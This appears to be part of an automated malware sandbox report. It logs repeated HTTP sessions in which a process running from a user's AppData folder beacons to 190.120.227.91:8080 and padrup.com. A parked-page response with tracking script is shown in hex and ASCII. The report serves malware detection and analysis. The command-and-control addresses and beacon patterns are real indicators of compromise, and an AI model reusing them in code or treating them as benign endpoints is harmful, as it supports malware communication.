                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.153238058 CEST224INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI5OC43ODU2OjNkMzRiYzE4MDBmMmRmZWQ2NDEyZjliNDhjMzBjNTMxYThmYWM0YjQ4MWNjNGQ2ZGU4ZjJmY2RjMzY1ZjdmNmU6Njc
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.153280020 CEST1236INData Raw: 78 4d 6a 4e 6a 4d 6d 46 69 5a 6d 4e 6b 59 77 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72 20 78 6b 77 20 3d 20 27 27 3b 0a 76
                                                                                                                                                                                                                                                                                          Data Ascii: xMjNjMmFiZmNkYw==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</script>
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.153316021 CEST540INData Raw: 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32 33 63 32 62 26 74 6f 6b 65 6e 3d 27
                                                                                                                                                                                                                                                                                          Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123c2b&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, 'cbc227fd7d1ffa049f7bfb6381b07c4e31462ee6a85');</script><script type='


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          70192.168.2.950052190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.245826960 CEST169OUTGET /sobakavolos.gif?2e54b34b=777302859 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          71192.168.2.950053185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:03.738311052 CEST158OUTGET /sobaka1.gif?2ff37fd5=-1349550467 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:04.962414026 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:45:04 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_kF/3xdliG72JxMjNvQwvXiOY0HhaT4bnF1To5NcnASbPKuC+8t2/hrh+orj7UUKwmRVh1QNcvvZPokOXslJjfw==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:04.962460041 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODMwNC41ODM6ZWYxNzZhMWZkMGQ1NTRjOGQwMzZjMzI2Y2RmMjJlYTIzYWRlNzliYzI2MGM5YmVlNGI5MWIwNTcxZmNiYWY1YTo2NzEyM2MzMDhlNTdl';var
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:04.962475061 CEST424INData Raw: 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65
                                                                                                                                                                                                                                                                                          Data Ascii: = '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:04.964313030 CEST336INData Raw: 0d 0a 31 34 32 0d 0a 39 36 36 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 77 69 6e
                                                                                                                                                                                                                                                                                          Data Ascii: 142966');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.href


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          72192.168.2.950054190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:05.488503933 CEST170OUTGET /sobakavolos.gif?308e5400=-443594752 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          73192.168.2.950055185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:10.036904097 CEST157OUTGET /sobaka1.gif?311dbd80=1473261184 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:11.223932028 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:45:11 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_L/I+dWTkInNk/DSuU6jAmEEA8WMOTFqbm2nPeOyi/GwhdVjuQN6ALjbssQIjv0Uz5BuuXoPGmjsEgAFIlrTq7g==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:11.223968983 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODMxMC44MzQxOmNkNzliMmVhMjA2ZmQzNzJjNmE0ZjI1NjU0N2VjOTA4YWU2MGM5NGQ2ZjRkYmE5MTNhOGRlMjI1OTk4YTYzOTc6NjcxMjNjMzZjYmEyNw==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:11.223989010 CEST764INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          74192.168.2.950056190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:11.938774109 CEST171OUTGET /sobakavolos.gif?31430591=-1815539533 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          75192.168.2.950057185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:16.550440073 CEST157OUTGET /sobaka1.gif?31c7acfb=1551219421 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:17.699736118 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:45:17 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_ExRvyDzlzkuo38dDlcumIuPfj0VK/TdMkYSCL9a/ujVQEVVhx3r0Jcy8uZjM4X0FXC4YoFKHJgPPTwaP2PxbuA==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:17.699767113 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODMxNy4zNDU6M2JlMWZmZmE1ZDRiN2VlN2M2MzhiZmNhYmM5MTE1MGUyM2FmOGY3YTA2ZTU5MDlkNWQ4ZmY2ZTgzMzIzOGI4Nzo2NzEyM2MzZDU0M2Mx';var
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:17.699784040 CEST760INData Raw: 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65
                                                                                                                                                                                                                                                                                          Data Ascii: = '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          76192.168.2.950058190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:17.932123899 CEST171OUTGET /sobakavolos.gif?31e7f67c=-1054365092 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          77192.168.2.950059185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:22.511851072 CEST156OUTGET /sobaka1.gif?3269d32c=845796140 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641213894 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:45:23 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_Nqag8O/BcigfJAXC6bKFgQh4fqBMm+K0/qcy0/SywX2U0lPyZM54jGOy1Khfk7xqQfK5EcymE7C6zY2qSd0zOA==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
